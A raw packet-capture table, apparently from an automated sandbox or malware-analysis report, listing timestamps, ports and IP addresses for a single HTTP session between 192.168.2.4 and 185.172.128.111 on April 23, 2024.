Apr 23, 2024 09:27:02.862828970 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:02.862870932 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:02.862880945 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:02.862919092 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:02.862957001 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:02.862962008 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:02.862962008 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:02.862993002 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:02.862994909 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:02.863014936 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:02.863029003 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:02.863042116 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:02.863065958 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:02.863078117 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:02.863101006 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:02.863121033 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:02.863137007 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:02.863153934 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:02.863173008 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:02.863205910 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:02.863209963 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:02.863228083 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:02.863245964 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:02.863260031 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:02.863300085 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:02.863300085 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:02.863334894 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:02.863354921 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:02.863373041 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:02.863394022 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:02.863409996 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:02.863431931 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:02.863445044 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:02.863466978 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:02.863496065 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:02.863501072 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:02.863550901 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.069255114 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.069303989 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.069339991 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.069375038 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.069376945 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.069411993 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.069438934 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.069447994 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.069461107 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.069485903 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.069504976 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.069521904 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.069551945 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.069571018 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.069576979 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.069612980 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.069631100 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.069648027 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.069664955 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.069684029 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.069705009 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.069720030 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.069735050 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.069755077 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.069772005 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.069789886 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.069809914 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.069825888 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.069849014 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.069860935 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.069885969 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.069897890 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.069919109 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.069932938 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.069957972 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.069967985 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.069988012 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.070023060 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.070024014 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.070060015 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.070080996 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.070096016 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.070116043 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.070132017 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.070152044 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.070168972 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.070200920 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.070205927 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.070219994 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.070242882 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.070257902 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.070278883 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.070300102 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.070313931 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.070336103 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.070348978 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.070373058 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.070384026 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.070401907 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.070420027 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.070444107 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.070455074 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.070472002 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.070491076 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.070511103 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.070525885 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.070547104 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.070563078 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.070585012 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.070597887 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.070621967 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.070633888 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.070660114 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.070669889 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.070691109 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.070705891 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.070724964 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.070760012 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.276701927 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.276746988 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.276777029 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.276783943 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.276812077 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.276822090 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.276829958 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.276859999 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.276881933 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.276895046 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.276913881 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.276931047 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.276962042 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.276987076 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.276997089 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.277021885 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.277043104 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.277057886 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.277092934 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.277095079 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.277112007 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.277128935 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.277156115 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.277163982 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.277177095 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.277218103 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.277246952 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.277256966 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.277292967 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.277296066 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.277328968 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.277331114 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.277348042 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.277364969 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.277381897 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.277400970 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.277416945 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.277436972 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.277453899 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.277472973 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.277488947 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.277508974 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.277525902 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.277544022 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.277559042 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.277579069 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.277601004 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.277614117 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.277645111 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.277650118 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.277669907 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.277687073 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.277710915 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.277723074 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.277746916 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.277757883 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.277784109 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.277792931 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.277801991 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.277828932 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.277844906 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.277863979 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.277882099 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.277899981 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.277920008 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.277936935 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.277956009 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.277971983 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.277992964 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.278007984 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.278038979 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.278043032 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.278059959 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.278079033 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.278095961 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.278114080 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.278134108 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.278151989 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.278165102 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.278188944 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.278203964 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.278225899 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.278247118 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.278264046 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.278299093 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.278301001 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.278330088 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.278337002 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.278351068 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.278373003 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.278387070 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.278409004 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.278422117 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.278444052 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.278453112 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.278480053 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.278496027 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.278516054 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.278532982 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.278551102 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.278568029 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.278585911 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.278603077 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.278621912 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.278645992 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.278656006 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.278671026 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.278692007 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.278707981 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.278728962 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.278747082 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.278764009 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.278785944 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.278799057 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.278810024 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.278834105 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.278848886 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.278870106 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.278889894 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.278906107 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.278924942 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.278940916 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.278958082 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.278976917 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.278992891 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.279014111 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.279031038 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.279051065 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.279074907 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.279086113 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.279098988 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.279122114 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.279138088 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.279158115 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.279174089 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.279195070 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.279206991 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.279232025 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.279242992 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.279268026 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.279284000 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.279304028 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.279320002 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.279340029 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.279359102 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.279376030 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.279396057 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.279411077 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.279424906 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.279447079 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.279480934 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.279481888 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.279500961 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.279515982 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.279537916 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.279550076 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.279561043 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.279587030 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.279597044 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.279642105 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.485410929 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.485490084 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.485527992 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.485562086 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.485596895 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.485634089 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.485661983 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.485671043 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.485661983 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.485661983 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.485661983 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.485661983 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.485709906 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.485744953 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.485759020 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.485759020 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.485759020 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.485780954 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.485789061 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.485816956 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.485841990 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.485852003 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.485869884 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.485901117 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.485908031 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.485935926 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.485970974 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.486005068 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.486005068 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.486021996 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.486042023 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.486057997 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.486068010 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.486093998 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.486105919 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.486129045 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.486138105 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.486164093 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.486191034 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.486201048 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.486212969 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.486236095 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.486246109 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.486270905 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.486280918 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.486308098 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.486318111 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.486342907 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.486355066 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.486378908 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.486404896 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.486417055 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.486426115 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.486453056 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.486480951 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.486486912 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.486510038 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.486525059 CEST	80	49730	185.172.128.111	192.168.2.4
